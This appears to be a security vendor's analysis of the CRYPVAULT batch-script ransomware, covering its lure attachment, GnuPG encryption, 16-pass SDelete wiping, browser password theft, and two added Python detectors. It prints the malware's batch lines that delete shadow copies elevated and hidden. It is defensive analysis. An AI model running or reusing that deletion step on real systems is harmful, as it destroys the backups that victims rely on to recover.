We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. Encrypted files are given a *.VAULT file extension, mimicking the "vault", the antivirus software service that keeps quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.
- Crypto-ransomware detected as BAT_CRYPVAULT.A
- SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)
- GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)
- Library file of GnuPG (will be renamed to iconv.dll by the malware)
The script will execute the crypto-ransomware after downloading the files mentioned above. The downloaded files are then saved in the %User Temp% folder.
Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js
I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as those of AVG, Microsoft, etc.) to the file name in order to bypass their scan engines.
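The decoy file name above, as an added example that is not part of the original post: a small attachment-name heuristic that flags a script extension hidden behind a document extension and the scanner-verdict words (AVG, Checked, OK, SIGNED) the attackers embedded. The extension and token lists are assumptions chosen for this sample, not a vendor's rule set.

```python
import re

# File extensions the Windows shell executes as a script on double-click.
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "bat", "cmd"}
# Document extensions that attackers place before the real one as a decoy.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
# Words lifted from scanner verdict lines (AVG.Checked.OK, SIGNED) to look legitimate.
SCANNER_TOKENS = {"avg", "checked", "ok", "clean", "scanned", "signed"}


def attachment_findings(filename: str) -> list[str]:
    """Return the reasons an attachment name looks like a CRYPVAULT-style lure."""
    parts = filename.lower().split(".")
    findings: list[str] = []
    if len(parts) < 2:
        return findings  # no extension at all: nothing to judge here
    final_ext, inner = parts[-1], parts[1:-1]
    if final_ext in SCRIPT_EXTS:
        findings.append(f"executes as a script (.{final_ext})")
        # Any document extension sitting before the script extension is a decoy.
        decoys = [p for p in inner if p in DOC_EXTS]
        if decoys:
            findings.append(f"document extension .{decoys[-1]} hidden before .{final_ext}")
    # Split every non-final segment on _ - and whitespace and look for verdict words.
    words = {w for seg in parts[:-1] for w in re.split(r"[_\-\s]+", seg)}
    found = sorted(words & SCANNER_TOKENS)
    if found:
        findings.append("scanner-verdict strings in name: " + ", ".join(found))
    return findings


if __name__ == "__main__":
    # The attachment name from Figure 1 (constructed input for this run).
    lure = "Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js"
    for reason in attachment_findings(lure):
        print(reason)
```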
Upon execution, the malware installs an open source encryption tool called GNU Privacy Guard (GnuPG) into the affected system, which starts the encryption process. This file will generate an RSA-1024 public and private key pair used in the encryption of user files.
Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)
It then looks for files to encrypt. The files extensions it targets are as follows:
Figure 3. The malware searches for files matching its list of file extensions and encrypts each file using a file it drops called svchost.exe (the renamed GnuPG executable)
To avoid causing system malfunction, the malware skips the following folders:
- com_ intel
After encrypting the user’s files, the malware will then append a *.vault file extension.
The malware uses the following script to make the affected system display the ransom note when the file is opened:
Figure 4: Script used by the malware to display the ransom note
After encryption, the malware changes the icon associated with the *.vault file extension to a padlock. Each "locked" and encrypted file will display a ransom note when opened, as shown in the image below.
Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.
The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.
Figure 6. The dropped file VAULT.txt, written in Russian, is found in the Desktop folder. It provides instructions on how to decrypt the files.
Figure 7. Ransom note via an HTML Application (.HTA) file that is displayed on the infected system's desktop after the encryption of the user's files
Deleting backup, traces of encryption, and malware components
The malware deletes the key files secring.gpg, vaultkey.vlt, and confclean.lst by using SDelete, a Microsoft Sysinternals tool. SDelete is capable of overwriting a deleted file's disk data, which makes it difficult or nearly impossible to recover deleted files.
Though this isn't the first time we're seeing SDelete being used in crypto-ransomware attacks, it appears that this is the first time malware has used 16 overwrite passes to make sure that recovery tools will have a hard time trying to reconstruct the deleted file. This file arrives on the affected system together with the ransomware.
Figure 8. Key files deleted that were used in the encryption process
Figure 9. The malware deletes the key files using sDelete
The malware deletes shadow volume copies if they exist on the system. The batch script writes a small VBS file that launches wmic.exe with elevated privileges ("runas") to do so:
```batch
rem Writes %temp%\win.vbs, which runs "wmic shadowcopy delete" elevated and hidden
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
```
Figure 10. The malware deletes its components at the end of its routine
Downloads info-stealing malware
The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:
- Mozilla Firefox
- Internet Explorer
- Google Chrome
- Opera Browser
- SRWare Iron
- Comodo Dragon
After execution of the tool, the malware resumes control and drops a Visual Basic script called up.vbs that will upload the password dump report back to the C&C server.
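The behaviours described above, the renamed SDelete and GnuPG components running from %User Temp%, the 16-pass secure delete, the wmic shadowcopy delete issued from win.vbs, and the up.vbs uploader, expressed as detection logic over constructed process-creation events. This is an added example, not code from the original post or from the malware; the `-p <passes>` flag is SDelete's documented option, but the assumption that the renamed copy is invoked with it, and all sample command lines, are constructed.

```python
import re
from pathlib import PureWindowsPath

# Names CRYPVAULT gives its downloaded helper tools (renamed SDelete and GnuPG).
# Both are real Windows binary names that normally live under System32, so the
# signal is the unusual location, not the name.
RENAMED_TOOLS = {"audiodg.exe", "svchost.exe"}


def classify_event(image: str, cmdline: str) -> list[str]:
    """Return the CRYPVAULT behaviours matched by one process-creation event."""
    image_l, cmd_l = image.lower(), cmdline.lower()
    name = PureWindowsPath(image_l).name
    hits: list[str] = []
    # Component binaries executed from a Temp folder instead of System32.
    if name in RENAMED_TOOLS and "\\temp\\" in image_l:
        hits.append(f"{name} running from Temp")
    # Shadow copy deletion, as issued by the win.vbs shown above.
    if name == "wmic.exe" and re.search(r"shadowcopy\s+delete", cmd_l):
        hits.append("shadow copy deletion")
    # Multi-pass wipe: SDelete takes -p <passes>; this sample uses 16 passes.
    # (Assumption: the renamed copy is called with the same flag.)
    m = re.search(r"(?:^|\s)-p\s+(\d+)", cmd_l)
    if m and name in (RENAMED_TOOLS | {"sdelete.exe"}) and int(m.group(1)) >= 8:
        hits.append(f"{m.group(1)}-pass secure delete")
    # The up.vbs exfiltration script run via Windows Script Host.
    if name in {"wscript.exe", "cscript.exe"} and "up.vbs" in cmd_l:
        hits.append("up.vbs upload script")
    return hits


def scan(events: list[dict]) -> list[tuple[str, str]]:
    """Run classify_event over process events and collect (image, behaviour) pairs."""
    return [(e["image"], h) for e in events for h in classify_event(e["image"], e["cmdline"])]


# Constructed sample events in the shape of process-creation telemetry (not real logs).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "cmdline": "svchost.exe -e -r vault report.docx"},
    {"image": r"C:\Users\bob\AppData\Local\Temp\audiodg.exe", "cmdline": "audiodg.exe -p 16 secring.gpg"},
    {"image": r"C:\Windows\System32\wbem\wmic.exe", "cmdline": "wmic.exe shadowcopy delete /nointeractive"},
    {"image": r"C:\Windows\System32\wscript.exe", "cmdline": r"wscript.exe C:\Users\bob\AppData\Local\Temp\up.vbs"},
]

if __name__ == "__main__":
    for image, behaviour in scan(SAMPLE_EVENTS):
        print(f"{behaviour:32} {image}")
```

The first sample event (the legitimate svchost.exe from System32) produces no hit, which is the point of keying on the path rather than the name.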
We've also noticed that, despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionality: it is not written in a full programming language but as a batch script. It also doesn't import any libraries or define functions, and the components that come with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.
Ransomware is becoming the next big thing among threat actors. Making important user files unusable forces more people to pay the ransom. As more ransomware appears in the wild, we advise backing up files on a regular basis.
Update as of April 7, 2015, 11:00 P.M. PST:
We have edited the first paragraph of the entry to clarify a statement about the quarantined files.
Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.